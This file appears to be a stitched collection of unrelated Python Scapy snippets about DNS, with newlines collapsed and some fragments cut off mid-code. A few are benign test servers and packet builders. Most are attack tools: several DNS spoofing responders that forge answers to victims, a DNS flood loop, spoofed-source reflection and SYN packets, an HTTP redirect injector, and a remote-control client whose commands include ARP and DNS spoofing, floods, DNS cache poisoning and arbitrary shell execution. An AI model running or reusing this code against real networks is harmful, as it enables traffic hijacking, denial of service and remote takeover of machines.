def dns_request_factory(id_num): packet = network.DNS(id=random.randrange(0, 65536, 1), rd=1, qdcount=1, qd=network.DNSQR(qname=str(id_num) + ".yumi.ipl.eecs.case.edu")) return bytes(packet)
def handle_packet(packet): ip = packet.getlayer(scapy.IP) udp = packet.getlayer(scapy.UDP) dns = packet.getlayer(scapy.DNS) # standard (a record) dns query if dns.qr == 0 and dns.opcode == 0: queried_host = dns.qd.qname[:-1] resolved_ip = None if dns_map.get(queried_host): resolved_ip = dns_map.get(queried_host) elif dns_map.get('*'): resolved_ip = dns_map.get('*') if resolved_ip: dns_answer = scapy.DNSRR(rrname=queried_host + '.', ttl=330, type="A", rclass="IN", rdata=resolved_ip) dns_reply = scapy.IP(src=ip.dst, dst=ip.src) / \ scapy.UDP(sport=udp.dport,dport=udp.sport) / \ scapy.DNS( id = dns.id, qr = 1, aa = 0, rcode = 0, qd = dns.qd, an = dns_answer ) print "Send %s has %s to %s" % (queried_host, resolved_ip, ip.src) scapy.send(dns_reply, iface=dev)
def handle(self) -> None: try: # packet_content = network.DNS(self.data.strip()) packet_content = network.DNS(self.request[0].strip()) question_name = packet_content[network.DNSQR].qname.decode() status_code = _STATUS_CODE.get(packet_content.rcode, "unknown status") question_id = question_name.split(".")[0] response_ip = self.client_address[0] if status_code == "ok" and packet_content.ancount > 0: answer = packet_content[network.DNSRR].rdata == CORRECT_ANSWER statistics = { "session_id": question_id, "ip_address": response_ip, "status": status_code if answer else "answer error", "response_time": time.time() } # if answer: # self.backend.insert(response_ip) else: statistics = { "session_id": question_id, "ip_address": response_ip, "status": status_code, "response_time": time.time() } self.__write_to_database(statistics) except: print("Has an Error (IP: {}) but handled".format( self.client_address[0]))
def read_packet_info(packet:bytes) -> {str:str}: packet_content = network.DNS(packet) try: # packet_content.show() trans_id = packet_content[network.DNS].id question = packet_content[network.DNS][network.DNSQR].qname except IndexError as e: print(e) return None ################# Below is for EDNS0 ################# edns_support = packet_content[network.DNS].haslayer(network.DNSRROPT) edns_bufsize = -1 if edns_support: edns_bufsize = packet_content[network.DNS][network.DNSRROPT].rclass return { "Transaction ID" : trans_id, "Question" : question, "Support EDNS0" : edns_support, "EDNS0 Bufsize" : edns_bufsize }
def generate(self, ip_dst=None, eth_dst=None): """Generates a mDNS v4 packet for multicast DNS config Args: ip_dst: IP destination address (Optional) eth_dst: Ethernet (layer 2) destination address (Optional) """ # Overwrite standard fields if desired sta_ip = (ip_dst if ip_dst is not None else MDNS_V4_IP_DST) sta_hw = (eth_dst if eth_dst is not None else MDNS_V4_MAC_DST) # Create mDNS layer qdServer = scapy.DNSQR(qname=self.src_ipv4, qtype=MDNS_QTYPE) mDNS = scapy.DNS(rd=MDNS_RECURSIVE, qd=qdServer) # Create UDP udp = scapy.UDP(sport=MDNS_UDP_PORT, dport=MDNS_UDP_PORT) # Create IP layer ip4 = scapy.IP(src=self.src_ipv4, dst=sta_ip, ttl=255) # Create Ethernet layer ethernet = scapy.Ether(src=self.src_mac, dst=sta_hw) self.packet = ethernet / ip4 / udp / mDNS return self.packet
def dnspunch(self): # punchpkt e = scapy.Ether(dst=self.router_mac) self.msg("sending punchies...") pkt = scapy.IP(src=self.server_ip, dst=self.attacker_ip) pkt /= scapy.UDP(sport=53, dport=53) pkt /= scapy.Raw("udp holepunch test") scapy.sendp(e / pkt, iface=self.interface) # rqpkt self.msg("sending DNS request to %s asking %s..." % (self.server_ip, self.domain)) pkt = scapy.IP(src=self.attacker_ip, dst=self.server_ip) pkt /= scapy.UDP(sport=53, dport=53) pkt /= scapy.DNS(rd=1, qd=scapy.DNSQR(qname=self.domain)) x, u = scapy.srp(e / pkt, timeout=5, iface=self.interface) self.msg('ok') for p in x[0]: p.show() if p[1].proto == 1: print "%s %s/%s" % (p[1].sprintf("%IP.src%"), p[1].sprintf("%ICMP.type%"), p[1].sprintf("%ICMP.code%")) else: p[1].show()
def check_DNS_response(response: bytes, ip_address: str, number_of_entry=100) -> "status": readable_packet = network.DNS(response) if readable_packet.ancount != number_of_entry: return "TCP wrong number of records ({} entries)".format( readable_packet.ancount) else: answers = [ readable_packet.an[index].rdata for index in range(number_of_entry) ] names = [ readable_packet.an[index].rrname.decode() for index in range(number_of_entry) ] if answers != [ "192.168.0.{}".format(num) for num in range(number_of_entry) ]: return "TCP wrong answer values" request_id = hex(ip_2_int(ip_address)) correct_name = "jumbo-" + request_id + QUESTION_ZONE if set(names) != { correct_name + ".", }: return "TCP wrong name entries" return "TCP answer OK"
def handle_packet(packet): ip = packet.getlayer(scapy.IP) udp = packet.getlayer(scapy.UDP) # Ignore packets containing data we aren't interested # in. if hasattr(packet, 'qd') and packet.qd is not None: queried_host = packet.qd.qname[:-1].decode("utf-8") if queried_host is None: print("queried_host is None, dropping request") return # If the queried_host is one of the domains we want # to spoof, return the spoof_ip. if queried_host in spoof_domains: print("!!!! Spoofing DNS request for %s by %s !!!!" % (queried_host, ip.src)) resolved_ip = spoof_ip # Else use dns.resolver to make a real DNS "A record" # request, and return the result of that. else: print("Forwarding DNS request for %s by %s" % (queried_host, ip.src)) a_records = dns.resolver.query(queried_host, 'A') resolved_ip = a_records[0].address # Build the DNS answer dns_answer = scapy.DNSRR( rrname=queried_host + ".", ttl=330, type="A", rclass="IN", rdata=resolved_ip) # Build the DNS response by constructing the IP # packet, the UDP "datagram" that goes inside the # packet, and finally the DNS response that goes # inside the datagram. dns_response = \ scapy.IP(src=ip.dst, dst=ip.src) / \ scapy.UDP( sport=udp.dport, dport=udp.sport ) / \ scapy.DNS( id = packet[scapy.DNS].id, qr = 1, aa = 0, rcode = 0, qd = packet.qd, an = dns_answer ) print("Resolved DNS request for %s to %s for %s" % (queried_host, resolved_ip, ip.src)) # Use scapy to send our response back to your phone. scapy.send(dns_response, iface=iface) else: print("Ignoring unrecognized packet from %s" % ip.src)
def make_response(transaction_id:str, question_name:bytes, size=3, cname=False) -> network.DNS: if question_name == b"yumi.ipl.eecs.case.edu.": return network.DNS( id=transaction_id, qr=1, aa=1, ra=1, qdcount=1, qd=network.DNSQR(qname=question_name), ancount=1, an=network.DNSRR( rrname=question_name, rdata="129.22.150.112" ) ) if cname: return network.DNS( id=transaction_id, qr=1, aa=1, ra=1, qdcount=1, qd=network.DNSQR(qname=question_name), ancount=1, an=network.DNSRR( rrname=question_name, type=5, #CNAME rdata="cname-"+question_name.decode() ) ) records = ["192.168.0.{}".format(num) for num in range(size)] base_record = network.DNSRR(rrname=question_name, ttl=600, rdata=records[0]) for resource_records in records[1:]: base_record /= network.DNSRR(rrname=question_name, ttl=600, rdata=resource_records) return network.DNS( id=transaction_id, qr=1, aa=1, ra=1, qdcount=1, qd=network.DNSQR(qname=question_name), ancount=len(records), an=base_record )
def correct_packet(source_port, identification): UDP_header = network.UDP(sport=53, dport=source_port) raw_packet = network.DNS(id=identification, ancount=1, an=network.DNSRR( rrname="one.yumi.ipl.eecs.case.edu", rdata="129.22.150.112")) return UDP_header / raw_packet
def setUp(self): """ Setup class for DNS_Amplification. """ # Create scapy packet (valid attack) self.pkt = scapy.IP(src="10.0.2.15", dst="dns.google") \ / scapy.UDP(dport=53) \ / scapy.DNS(rd=1, qd=scapy.DNSQR(qname="google.com", qtype="ANY")) # Create a scapy packet (invalid attack) self.pkt2 = scapy.IP(src="10.0.2.15", dst="0.0.0.0") \ / scapy.UDP(dport=53) \ / scapy.DNS(rd=1, qd=scapy.DNSQR(qname="google.com", qtype="ANY")) # Create DNS Amplification object self.dns_amp_obj = DNS_Amplification()
def handle_packet(self, packet): if self.stop != '': print 'stopping' exit() ip = packet.getlayer(scapy.IP) # if ip.src !='': # if ip.src != self.victim_ip: # return 0 udp = packet.getlayer(scapy.UDP) dhcp = packet.getlayer(scapy.DHCP) dns=packet.getlayer(scapy.DNS) # #take no action when the paket doesnt come from target victim # print str(self.victim_ip).strip() + " and ===> "+ str(ip.src).strip() if self.victim_ip != '': if str(self.victim_ip).strip() != str(ip.src).strip(): return 0 # print 'dns qr '+ str(dns.qr) +' and opcode is ' + str (dns.opcode) # print dns if dns.qr == 0 and dns.opcode == 0: queried_host = dns.qd.qname[:-1] resolved_ip = None if self.address_to_spoof !='': if str(queried_host).strip() != str(self.address_to_spoof).strip(): #print 'The queried host is not our target i.e. '+ str(queried_host).strip()+"and ===> "+ str(self.address_to_spoof).strip() return 0 resolved_ip=self.fake_ip print "about to spoof queried host"+str(queried_host)+ " from source ip "+ str(ip.src) if resolved_ip: #print "=======>"+str(resolved_ip) dns_answer = scapy.DNSRR(rrname=queried_host + ".", ttl=330, type="A", rclass="IN", rdata=resolved_ip) dns_reply = scapy.IP(src=ip.dst, dst=ip.src) / \ scapy.UDP(sport=udp.dport, dport=udp.sport) / \ scapy.DNS( id = dns.id, qr = 1, aa = 0, rcode = 0, qd = dns.qd, an = dns_answer ) #print dns_reply print "\n\n fooled comp with ip %s that server %s has ip address %s \n\n" % (ip.src, queried_host, resolved_ip) scapy.send(dns_reply, iface=self.dev)
def traceroute_dns_servers(hosts, fqdn): """ Run UDP traceroutes to the given DNS servers, using FQDN in DNS requests. """ log.info("Running UDP traceroutes to %d servers." % len(hosts)) addrs = [host.addr for host in hosts] udp_datagram = scapy.UDP(sport=scapy.RandShort()) dns_msg = scapy.DNS(qd=scapy.DNSQR(qname=fqdn)) return scapy.traceroute(addrs, l4=udp_datagram / dns_msg, verbose=0)
def redirect_process(packet): scapy_packet = scapy.IP(packet.get_payload()) if scapy_packet.haslayer(scapy.DNSRR): qname = scapy_packet[scapy.DNSQR].qname answer = scapy.DNS(rrname=qname, rdata="192.168.1.10") scapy_packet[scapy.DNS].an = answer scapy_packet[scapy.DNS].ancount = 1 del scapy_packet[scapy.IP].chksum del scapy_packet[scapy.IP].len del scapy_packet[scapy.UDP].chksum del scapy_packet[scapy.UDP].len packet.set_paylaod(str(scapy_packet)) packet.accept()
def create_dns_response(dns_qid, qdsec, ansec, nssec, ip, udp): dns = scapy.DNS(id=dns_qid, qr=1, aa=1, rcode=0, qdcount=1, ancount=1, nscount=1, arcount=0, qd=qdsec, an=ansec, ns=nssec, ar=None) response = scapy.raw(ip / udp / dns) return response
def handle(packet): global hostfile_dict # Only deal with packets containing DNS records if packet.haslayer(scapy.DNS): # Dissect packet into approriate layers orig_ip = packet.getlayer(scapy.IP) orig_udp = packet.getlayer(scapy.UDP) orig_dns = packet.getlayer(scapy.DNS) # If -h option provided if hostfile_dict: # Check if queried domain part of hostfile if (packet.getlayer(scapy.DNS).qd.qname) not in hostfile_dict.keys(): return spoofed_rdata = hostfile_dict[orig_dns.qd.qname] else: # Spoofed IP of local machine ni.ifaddresses(dev) spoofed_rdata = ni.ifaddresses(dev)[ni.AF_INET][0]['addr'] #qr = 0 for Query and qtype = 1 for A record if orig_dns.qr == 0 and orig_dns.qd.qtype == 1: spoofed_src_ip = orig_ip.dst spoofed_dst_ip = orig_ip.src spoofed_src_port = orig_udp.dport spoofed_dst_port = orig_udp.sport spoofed_id = orig_dns.id spoofed_qr = 1 spoofed_opcode = orig_dns.opcode spoofed_aa = 1 spoofed_rd = orig_dns.rd spoofed_ra = 0 spoofed_z = 0 spoofed_rcode = 0 spoofed_qdcount = 1 spoofed_ancount = 1 spoofed_question = scapy.DNSQR(qname = orig_dns.qd.qname, qtype = orig_dns.qd.qtype, qclass = orig_dns.qd.qclass) spoofed_answer = scapy.DNSRR(rrname = orig_dns.qd.qname, type = orig_dns.qd.qtype, rclass = orig_dns.qd.qclass, ttl = 40960, rdata = spoofed_rdata) # To return multiple IPs #/scapy.DNSRR(rrname = orig_dns.qd.qname, type = orig_dns.qd.qtype, rclass = orig_dns.qd.qclass, ttl = 40960, rdata = spoofed_rdata) spoofed_IP = scapy.IP(src = spoofed_src_ip, dst = spoofed_dst_ip) spoofed_UDP = scapy.UDP(sport = spoofed_src_port, dport = spoofed_dst_port) spoofed_DNS = scapy.DNS(id = spoofed_id, qr = 1, opcode = spoofed_opcode, aa = 1, rd = spoofed_rd, ra = 0, z = 0, rcode = 0, qdcount = spoofed_qdcount, ancount = spoofed_ancount, qd = spoofed_question, an = spoofed_answer) # Sendp sends from layer 2 scapy.sendp(scapy.Ether()/spoofed_IP/spoofed_UDP/spoofed_DNS, iface = dev )
def handle_packet(packet): ip = packet.getlayer(scapy.IP) udp = packet.getlayer(scapy.UDP) dhcp = packet.getlayer(scapy.DHCP) dns = packet.getlayer(scapy.DNS) #print decoder.decode(packet) # standard (a record) dns query print dns.qr if dns.qr == 0 and dns.opcode == 0: queried_host = dns.qd.qname[:-1] resolved_ip = None print "queried host is " + str( queried_host) + "and ip source is " + str( ip.src) + "Destination is " + str(ip.dst) if dns_map.get(queried_host): resolved_ip = dns_map.get(queried_host) print "=======>" + str(resolved_ip) elif dns_map.get('*'): resolved_ip = dns_map.get('*') print "l=======>" + str(resolved_ip) if resolved_ip: print "=======>" + str(resolved_ip) dns_answer = scapy.DNSRR(rrname=queried_host + ".", ttl=330, type="A", rclass="IN", rdata=resolved_ip) dns_reply = scapy.IP(src=ip.dst, dst=ip.src) / \ scapy.UDP(sport=udp.dport, dport=udp.sport) / \ scapy.DNS( id = dns.id, qr = 1, aa = 0, rcode = 0, qd = dns.qd, an = dns_answer ) print "Send %s has %s to %s" % (queried_host, resolved_ip, ip.src) scapy.send(dns_reply, iface=dev)
def DNS_Flood(): clear = os.system('clear') #s = scapy.RandString(scapy.RandNum(1,10)) #s1 ='www' #print(s1) #a = scapy.RandNum(1,10) #print(a) #s2 = scapy.RandString(scapy.RandNum(1,5)) #s2 = s2.lower() #s2 = str(s2) #s2 = s2[2:-1] #print(s2) #process_id =process_id #s3 = 'com' #s = s1+'.'+s2+'.'+s3 #print("Please input target's IP:") #target = input("[DNS_Flood]#") #target = "172.16.4.80" #src_ip = scapy.RandIP() #print(s) num = 0 try: while True: packet = scapy.IP(dst="172.16.4.80") / scapy.UDP( sport=scapy.RandShort(), dport=53) / scapy.DNS( rd=1, qd=scapy.DNSQR(qname="www.flood.com")) #packets = scapy.IP(src=src_ip,dst=target)/scapy.UDP(sport=scapy.RandShort(),dport=53)/scapy.DNS(rd=1,qd=scapy.DNSQR(qname="www.flood.com")) #packet =scapy.IP(src=src_ip,dst=target)/scapy.TCP(dport=80,flags="S") #scapy.srflood(packet) scapy.send(packet, count=2000, verbose=False) #scapy.send(packets,verbose=False) num += 1 #if num == 1000: #print("%s,%s"%(name,num)) print(num) except KeyboardInterrupt: print("[-] Ctrl + C detected.....")
def pressure_task(self, serial_num): time_consumed = 0 with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock: while time_consumed < self.__time: packet = dns_request_factory(serial_num) sock.sendto(packet, ("localhost", 53)) start_time = time.time() response, (sip, sport) = sock.recvfrom(600) if sip == "127.0.0.1" and sport == 53: try: parsed_response = network.DNS(response) if parsed_response[network.DNSRR].rrname.decode( ).split(".")[0] == str(serial_num): self.__time_statistic.append(time.time() - start_time) except: self.__failed += 1 sleep_time = numpy.random.ranf() time.sleep(sleep_time) time_consumed += sleep_time
def handle_packet(packet): ip = packet.getlayer(scapy.IP) udp = packet.getlayer(scapy.UDP) dns = packet.getlayer(scapy.DNS) #DNS query if dns.qr == 0 and dns.opcode == 0: queried_host = dns.qd.qname[:-1] resolved_ip = None if dns_map.get(queried_host): resolved_ip = dns_map.get(queried_host) #No matter what's the host elif dns_map.get('*'): resolved_ip = dns_map.get('*') if resolved_ip: dns_answer = scapy.DNSRR(rrname=queried_host + ".", ttl=330, type="A", rclass="IN", rdata=resolved_ip) dns_reply = scapy.IP(src=ip.dst,dst=ip.src) /\ scapy.UDP(sport=udp.dport, dport=udp.sport)/ \ scapy.DNS( id= dns.id, qr=1, aa=0, rcode = 0, qd=dns.qd, an=dns_answer ) #if the destination is iface's ip function "send" will not work scapy.send(dns_reply, iface=dev) scapy.sniff(prn=result, iface=dev, filter=filter)
dns_ip = input("Insert IP: ") sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind((my_ip, my_port)) rawsock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) rawsock.setsockopt(socket.IPPROTO_IP, socket.SO_REUSEADDR, 1) ip = scapy.IP(src=my_ip, dst=dns_ip) qdsec = scapy.DNSQR(qname=my_domain, qtype="A", qclass="IN") dns = scapy.DNS(qr=0, opcode="QUERY", rd=1, qdcount=1, ancount=0, nscount=0, arcount=0, qd=qdsec) p = multiprocessing.Pool(8) print("Sending requests...") open_dns_ports = p.map(scan_dns, list(range(1, 65535 + 1))) p.close() p.join() open_dns_ports = [port for port in open_dns_ports if port is not None] print("Open Ports: {}".format(str(open_dns_ports).replace(' ', ''))) sock.close() rawsock.close() elif command == 'killarp':
def pkt(self): return scapy.IP(dst=self.dst) / scapy.UDP( sport=self.sport) / scapy.DNS(rd=1, qd=scapy.DNSQR(qname=self.qname))
def pkt_callback(pkt): if pkt.haslayer(scapy.Dot11): #print("got Wifi packet") # construct fake l2 for wifi packet macl = pkt.getlayer(scapy.Dot11) l2 = scapy.RadioTap() / scapy.Dot11( addr1=macl.addr2, addr2=macl.addr1, addr3=macl.addr3, FCfield="from-DS") / scapy.LLC(ctrl=3) / scapy.SNAP() elif pkt.haslayer(scapy.Ether): #print("got Ethernet packet") # construct fake l2 for ethernet packet macl = pkt.getlayer(scapy.Ether) l2 = scapy.Ether(dst=macl.src, src=macl.dst) else: print("protocol neither ethernet nor wifi, skipping") return if pkt.haslayer(scapy.IP): # construct fake l3 ipl = pkt.getlayer(scapy.IP) l3 = scapy.IP(src=ipl.dst, dst=ipl.src) else: #print("this is not IP packet, skipping") return if pkt.haslayer(scapy.TCP): #print("we have TCP packet") # construct fake layer 4 for TCP tcpl = pkt.getlayer(scapy.TCP) l4 = scapy.TCP(dport=tcpl.sport, sport=tcpl.dport) if tcpl.flags == 2: # syn return elif tcpl.flags == 24 or tcpl.flags == 16: # psh ack if pkt.haslayer(scapy.Raw): #print("packet has some data") tcpdata = pkt.getlayer(scapy.Raw).load if tcpdata.startswith("GET "): #print("TCP data starts with GET") dsturl = helper.getdsturl(tcpdata) if dsturl is None: return print("IP: %s, DST URL: %s" % (pkt.getlayer(scapy.IP).src, dsturl)) if dsturl.find('0x0a') != -1 or dsturl.find( '85.17') != -1 or dsturl.find( 'twitter') != -1 or dsturl.find( 'facebook') != -1 or dsturl.find( 'vk.com') != -1 or dsturl.find( 'blogger') != -1 or dsturl.find( 'odnoklassniki') != -1: print "inject success" return #credirpkt = redirpkt % {'url': "http://0x0a.net/" } credirpkt = redirpkt # construct reply packet pktreply = l2 / l3 / l4 pktreply.getlayer(scapy.TCP).seq = tcpl.ack pktreply.getlayer(scapy.TCP).ack = tcpl.seq + len(tcpdata) pktreply.getlayer(scapy.TCP).flags = "PA" # construct fin packet finpktreply = pktreply.copy() finpktreply.getlayer(scapy.TCP).flags = "FA" finpktreply.getlayer(scapy.TCP).seq += len(credirpkt) # add redir payload to reply packet pktreply.getlayer(scapy.TCP).add_payload(credirpkt) packetbasket = [pktreply, finpktreply] # send reply packet scapy.sendp(packetbasket, verbose=0, iface=interface) print("Reply sent") return elif tcpl.flags == 17: # fin ack return elif pkt.haslayer(scapy.UDP): # construct layer 4 for UDP udpl = pkt.getlayer(scapy.UDP) l4 = scapy.UDP(dport=udpl.sport, sport=udpl.dport) if pkt.haslayer(scapy.DNS): #print("We got DNS packet") dnsl = pkt.getlayer(scapy.DNS) if dnsl.qr == 0: print("We got DNS request packet: %s" % (dnsl.qd.qname)) pktreply = l2 / l3 / l4 / scapy.DNS( id=dnsl.id, qr=1, qd=dnsl.qd, an=scapy.DNSRR( rrname=dnsl.qd.qname, ttl=10, rdata="85.17.93.121")) scapy.sendp([pktreply], verbose=0, iface=interface) print("Reply sent") return else: print("protocol not TCP or UDP, skipping") #pkt.show() return
import argparse import scapy.all as scapy parser = argparse.ArgumentParser(description='MIE-SIB second homework. Use Scapy to send a TCP/SYN packet with a spoofed sender IP address and a DNS query with a spoofed sender IP address. The scrit only work\'s in a class C network (/24)') parser.add_argument('target', help='The IP address of the target') parser.add_argument('dns_server', help='The IP address of the DNS server') args = parser.parse_args() #Send UDP packet scapy.send(scapy.IP(src=args.target, dst=args.dns_server)/scapy.UDP(dport=53)/scapy.DNS(rd=1,qd=scapy.DNSQR(qname="www.thepacketgeek.com")),verbose=0) #Send TCP packet scapy.send(scapy.IP(src=scapy.Rand(args.target +"/24"), dst=args.target)/scapy.TCP(dport=3333, sport=4444, seq=12, flags="S"))
def make_DNS_request(ip_address: str) -> network.DNS: request_id = hex(ip_2_int(ip_address)) question_name = "jumbo-" + request_id + QUESTION_ZONE return network.DNS(rd=1, qdcount=1, qd=network.DNSQR(qname=question_name))
def run(self): while True: while not self.connected.value: self.reconnect() while True: try: command = self.reliable_receive() if command[0] == "arpspoof": try: kill_arp() except: pass try: scan_result = network_scanner() if scan_result: global selected global arp_process selected = scan_result arp_process = multiprocessing.Process( target=arp_spoof, args=(selected, router_ip)) arp_process.start() except: pass elif command[0] == 'dnsspoof': try: kill_dns() except: pass try: if arp_process and arp_process.is_alive(): try: kill_hook() except: pass target_website = command[1] modified_ip = command[2] global dns_process dns_process = multiprocessing.Process( target=dns_spoof, args=(target_website, modified_ip)) dns_process.start() except: pass elif command[0] == 'hook': try: kill_hook() except: pass try: if arp_process and arp_process.is_alive(): try: kill_dns() except: pass global hook_process hook_process = multiprocessing.Process( target=hook) hook_process.start() except NameError: pass elif command[0] == "synflood": try: flood_ip = command[1] flood_ports = list( map( int, command[2].translate( {ord(i): None for i in '[]'}).split(','))) flood_time = int(command[3]) pool = multiprocessing.Pool( processes=len(flood_ports)) pool.map( partial(syn_flooding, flood_ip=flood_ip, flood_time=flood_time), flood_ports) pool.close() pool.join() except: pass elif command[0] == "httpflood": try: flood_ip = command[1] flood_time = int(command[2]) http_flooding(flood_ip, flood_time) except: pass elif command[0] == "pod": try: flood_ip = command[1] flood_time = int(command[2]) ping_of_death(flood_ip, flood_time) except: pass elif command[0] == "dnscachepoison": try: spoofDomain = command[1] ns = command[2] nsAddr = command[3] dnsAddr = command[4] query = command[5] dnsPorts = list( map( int, command[6].translate( {ord(i): None for i in '[]'}).split(','))) start = int(command[7]) end = int(command[8]) if end > 65535: end = 65535 dnsQids = list(range(start, end + 1)) badAddr = "10.0.2.10" ip = scapy.IP(src=nsAddr, dst=dnsAddr) qdsec = scapy.DNSQR(qname=query, qtype="A", qclass="IN") ansec = scapy.DNSRR(rrname=ns, type="A", rclass="IN", ttl=60000, rdata=badAddr) nssec = scapy.DNSRR(rrname=spoofDomain, type="NS", rclass="IN", ttl=60000, rdata=ns) p_processes = [] manager = multiprocessing.Manager() total_responses = manager.list() for port in dnsPorts: p = multiprocessing.Process( target=fake_dns_responses, args=(port, dnsQids, qdsec, ansec, nssec, ip, total_responses)) p.start() p_processes.append(p) for process in p_processes: process.join() rawsock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) rawsock.setsockopt(socket.IPPROTO_IP, socket.SO_REUSEADDR, 1) ip = scapy.IP(src=randomize_ip(), dst=dnsAddr) qdsec = scapy.DNSQR(qname=query, qtype="A", qclass="IN") dns = scapy.DNS(id=randomize_integer(), qr=0, opcode="QUERY", rd=1, qdcount=1, ancount=0, nscount=0, arcount=0, qd=qdsec) sending_requests = multiprocessing.Process( target=send_dns_requests, args=(dnsPorts, ip, dns, dnsAddr, rawsock)) sending_fake_responses_processes = [] for port_responses in total_responses: port = port_responses[0] p = multiprocessing.Process( target=send_dns_responses_pool, args=(port, port_responses[1], dnsAddr, rawsock)) sending_fake_responses_processes.append(p) sending_requests.start() for process in sending_fake_responses_processes: process.start() sending_requests.join() for process in sending_fake_responses_processes: process.join() except: pass elif command[0] == "killarp": try: kill_arp() except: pass elif command[0] == "killdns": try: kill_dns() except: pass elif command[0] == "killhook": try: kill_hook() except: pass else: try: if command[0] == "exit": pass elif command[0] == "killconnection": self.connected.value = False break elif command[0] == "PING": command_result = "PONG" elif command[0] == "cd" and len(command) > 1: command_result = change_working_directory_to( command[1]) elif command[0] == "download": command_result = read_file(command[1]) elif command[0] == "upload": command_result = write_file( command[1], command[2]) else: command_result = execute_system_command( command) except: command_result = "[-] Error during command execution." self.reliable_send(command_result) except OSError: self.connected.value = False break
IPV4_PING = "\x08\x00\x00\x00\x0a\xce\x00\x03" IPV6_PING = "\x80\x00\x00\x00\x0a\xce\x00\x03" IPV4_ADDR = "8.8.8.8" IPV6_ADDR = "2001:4860:4860::8888" IPV6_SEQ_DGRAM_HEADER = (" sl " "local_address " "remote_address " "st tx_queue rx_queue tr tm->when retrnsmt" " uid timeout inode ref pointer drops\n") # Arbitrary packet payload. UDP_PAYLOAD = str(scapy.DNS(rd=1, id=random.randint(0, 65535), qd=scapy.DNSQR(qname="wWW.GoOGle.CoM", qtype="AAAA"))) # Unix group to use if we want to open sockets as non-root. AID_INET = 3003 def LinuxVersion(): # Example: "3.4.67-00753-gb7a556f". # Get the part before the dash. version = os.uname()[2].split("-")[0] # Convert it into a tuple such as (3, 4, 67). That allows comparing versions # using < and >, since tuples are compared lexicographically. version = tuple(int(i) for i in version.split(".")) return version
dns_answer = scapy.DNSRR( rrname=queried_host + ".", ttl=330, type="A", rclass="IN", rdata=resolved_ip) # Build the DNS response by constructing the IP # packet, the UDP "datagram" that goes inside the # packet, and finally the DNS response that goes # inside the datagram. dns_response = \ scapy.IP(src=ip.dst, dst=ip.src) / \ scapy.UDP( sport=udp.dport, dport=udp.sport ) / \ scapy.DNS( id = packet[scapy.DNS].id, qr = 1, aa = 0, rcode = 0, # qd = packet.qd, qd = 8090, an = dns_answer ) print("Resolved DNS request for %s to %s for %s" % (queried_host, resolved_ip, ip.src)) # Use scapy to send our response back to your phone. scapy.send(dns_response, iface=iface)